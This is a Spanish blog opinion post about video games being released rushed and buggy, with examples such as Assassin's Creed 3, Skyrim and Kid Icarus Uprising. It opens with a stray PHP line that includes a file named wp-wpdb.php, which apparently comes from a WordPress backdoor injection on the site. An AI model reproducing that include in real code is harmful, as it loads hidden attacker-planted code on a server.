if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Calidad VS Rapidez – La Fortaleza de LeChuck

Calidad VS Rapidez

Dejad un poco el mando, frenad, guardad partida y sentaos un momento a contemplar vuestra colección de juegos o a consultar los que vendrán en un futuro próximo. ¿Qué véis? ¿Grandes superproducciones bien paridas, completas al 100%, sin ningún tipo de error? O por el contrario tenemos muchos juegos considerados AAA cuya secuela significa encontrarte con algo similar pero mejorando y eliminando los bugs. Estamos ante el dilema Calidad VS Rapidez.


La verdad, y creo que muchos coincidirán, que estamos viviendo en una época donde muchos de los considerados grandes videojuegos salen casi como churros y con un control de calidad pésimo, o por lo menos no tan depurado como muchos esperarían de él.

Sé que hace poco hablé del bonito Assassin’s Creed 3, y se trata de un trabajo muy bien llevado, pero que no se salva de estos errores y en el cual se ha acelerado su salida por querer cumplir una fecha. Y es que pesé a tener un trabajo de varios años y que no está nada mal, también podemos comprobar que le falta algo más para depurar como por ejemplo los bugs, fallos de guión y otras chorradas que no se han arreglado por prisas.

Lo mismo podría decir de juegos como Skyrim, con errores comprensibles debido a la grandiosidad del título, pero que eso se arreglarían con más tiempo de desarrollo.

¿Exigimos demasiado a las empresas pidiendo que saquen cuanto antes nuestra saga favorita? Todos sabemos que vivimos acelerados, que todo lo queremos cuanto antes. ¿Pero preferís sacrificar calidad por rapidez? Opino que sí, yo he aprendido a esperar, pero sólo hace falta ver a mi alrededor para comprobar que hay mucha gente que prefiere sacrificar la calidad mientras le saquen su juego favorito repetido una y mil veces.

No siempre se puede decir que si lo haces rápido lo haces mejor, de echo nunca, os pongo ejemplos básicos del día a día. Si trabajas en un estudio de arquitectura y te piden que dibujes un detalle de un muro para ya… ¿creeis que quedará bien detallado en unas pocas horas? ¿Se entenderá? ¿Habrá errores? Si como informático tienes que crear un pequeño programa, por simple que sea, si no tienes tiempo para probarlo, buscar errores y compatibilidades, no tendrás un programa depurado. Y si por ejemplo eres un artísta y quieren una pintura para mañana nunca podrá quedar tan bien como algo bien pensado.

Creo que tenemos que empezar a pensar diferente, esperar más calidad y que no nos importe tanto el tiempo, os puedo poner un buen ejemplo más o menos actual demostrando que si no va a estar bien, mejor retrasar la salida.

El juego Kid Icarus Uprising es uno de los mayores ejemplos en ese sentido, se presentó cuando anunciaron 3DS, y este fue retrasando su salida durante mucho tiempo y en varias ocasiones. ¿Y por qué? Para conseguir un juego muy bien cuidado, con apenas errores, una historia bien ligada y donde se nota un cariño en TODO lo que tocas y haces. Sakurai en ese sentido es una persona que prefiere sacar un buen título a sacarlo a medias. En super Smash Bros Brawl pudimos ver el cariño que le puso en todo el juego, equilibrando mucho sus personajes, aunque las prisas y presión por sacarlo también hicieron mella, sobretodo viendo que en las carpetas del mismo juego existen nombres de personajes pensados pero que quedaron en el tintero y algunos de los personajes puestos con calzador y a toda prisa.

Vivimos demasiado rápido, y eso se nota no sólo en los videojuegos, también en el cine, en los libros y hasta en la música, nos encontramos que piden fechas de entrega que no permiten exprimir al máximo lo que un juego puede darnos.

¿Opináis que se debería exigir menos rapidez para conseguir grandes títulos de calidad? o ¿cuanta más cantidad mejor?

Yo opino que hay varios títulos que no necesitan mucho desarrollo, pero otros siempre serán mejores si consigues retrasar la fehca de entrega y pulir mucho más esa gran idea.

Publicada el
Categorizado como Opinión

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

Dejar un comentario